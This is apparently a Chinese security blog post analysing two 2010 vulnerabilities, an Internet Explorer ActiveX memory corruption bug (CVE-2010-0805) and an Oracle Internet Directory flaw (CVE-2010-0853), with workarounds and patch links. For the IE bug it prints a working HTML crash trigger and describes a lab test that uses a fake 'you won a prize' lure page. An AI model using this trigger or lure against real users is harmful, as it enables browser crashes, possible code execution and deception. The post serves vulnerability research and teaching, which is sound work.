cve漏洞分析:cve-2010-0805(附带测试代码) cve-2010-0853

【警告:以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负】

对象1:【附带攻击测试代码和效果演示】

1.      CVE编号cve-2010-0805

2.      微软漏洞编号ms10-018

3.      漏洞名称Microsoft IE Tabular Data Control ActiveX控件远程代码执行漏洞

4.      危害性:可执行远程特殊代码,溢出后获得当前用户权限

5.      危害等级:8

6.      涉及软件Microsoft IE

7.      受影响版本

Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0

Microsoft Internet Explorer 5.0.1 SP4

相关windows系统:

windows_2000::SP4

windows_xp::sp1

windows_xp::sp2

windows_xp::sp3

8.      漏洞分析

Internet ExplorerWindows操作系统中默认捆绑的web浏览器。Internet ExplorerTabular Data Control ActiveX模块(tdc.ocx)中存在栈破坏漏洞。如果向CTDCCtl::SecurityCHeckDataURL函数传送了超长的DataURL参数,就可以触发这个漏洞,导致向任意内存位置写入单个NULL字节。攻击者可以通过构建特制的网页来利用该漏洞,当用户查看网页时,该漏洞可能允许远程执行代码。成功利用此漏洞的攻击者可以获得与登录用户相同的用户权限。

9.      临时解决方法:

l  Office中禁用ActiveX控件。

l  Internet Explorer配置为在Internet和本地Intranet安全区域中运行ActiveX控件和活动脚本之前进行提示。

l  Internet 和本地Intranet安全区域设置设为“高”,以便在这些区域中运行ActiveX控件和活动脚本之前进行提示。

l  不要打开意外的文件或者邮件。

10.  厂商补丁:

Microsoft已经为此发布了一个安全公告(MS10-018)以及相应补丁

MS10-018Cumulative Security Update for Internet Explorer (980182)链接:http://www.microsoft.com/technet/security/bulletin/ms10-018.mspx?pf=true

11.  攻击测试代码:

 

# CVE : CVE-2010-0805

<!--

.text:600058F7                 and     [ebp+pv], 0

.text:600058FE                 lea     eax, [ebp+pv]

.text:60005904                 push    eax             ; unsigned __int16 **

.text:60005905                 push    dword ptr [ebx+10h] ; struct IOleClientSite *

.text:60005908                 call    GetHostURL(IOleClientSite *,ushort * *)

.text:6000590D                 mov     eax, [ebp+var_218]

.text:60005913                 push    [ebp+pv]        ; pv

.text:60005919                 mov     [ebp+eax+var_204], 0

.text:60005921                 mov     eax, [ebp+var_21C]    ; length of the DataURL param

.text:60005927                 mov     [ebp+eax+var_104], 0        ; write one byte to arbitrary stack address

-->

<html>

<title>Trigger for ZDI-10-034 by ZSploit.com</title>

<head>

</head>

<body>

<object classid="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83">

<param name="DataURL" value="http://zsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploi"/>

</object>

</body>

</html>

测试代码演示

 

12.  效果演示:

a 搭建环境:

操作系统

1)      Windows xp::SP2 测试环境

2)      Windows 7 比较环境

IE版本

IE 6.0 / IE8.0

IIS

IIS5.0

虚拟机

Vmware 7

b 测试过程:(只给出可用性攻击)

l  VM7中装入Windows xp sp2,配置IIS环境。

l  把测试代码写入记事本,保存为任意名称的html文件,如attack.html

l  attack.html放入 C:/Inetpub/wwwroot目录下(iis的默认目录)

l  做一个普通的html文件price.html,作为诱饵,显示文本为:恭喜你,中奖了!让此文本链接指向attack.html.  

 

l  打开IE浏览器(IE6.0),访问http://localhost/price.html, 点击“ 恭喜你,中奖了!”。 IE崩溃,界面瞬间消失。系统日志记录为:

l  同上在windows7下搭建以上环境,点击诱饵后,IEIE8)将显示attack.html中的内容,没有出现问题。

 

对象2

1.      CVE编号cve-2010-0853

2.      漏洞名称:

Oracle Fusion Middleware CVE-2010-0853 Oracle Internet目录远程漏洞

3.      危害性:拒绝服务、远程代码执行

4.      危害等级:7

5.      涉及软件:Oracle

6.      受影响版本:

Oracle Oracle9i Standard Edition 9.2 .8DV

Oracle Oracle9i Standard Edition 9.2 .8

Oracle Oracle9i Personal Edition 9.2 .8DV

Oracle Oracle9i Enterprise Edition 9.2 .8DV

Oracle Oracle9i Enterprise Edition 9.2 .8.0

Oracle Oracle Identity Management 10g 10.1.4 .0.1

Oracle Application Server 10.1.2.3

7.      漏洞分析:(此漏洞由oracle官方发布,对漏洞技术细节提及较少)

Oracle Fusion MiddlewareOracle 的中间件解决方案组合,用于协助开发、部署及管理SOA和其它应用程序。Oracle Fusion中间件所使用的Oracle Internet DirectoryPortal组件中存在安全漏洞,通过认证的远程用户可以通过LDAPHTTP协议来利用这些漏洞完全入侵数据库系统。

8.      厂商补丁:

Oracle已经为此发布了一个安全公告(cpuapr2010)以及相应补丁:

cpuapr2010Oracle Critical Patch Update Advisory - April 2010

链接:http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2010.html

 

 

 

 

 

 

 

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值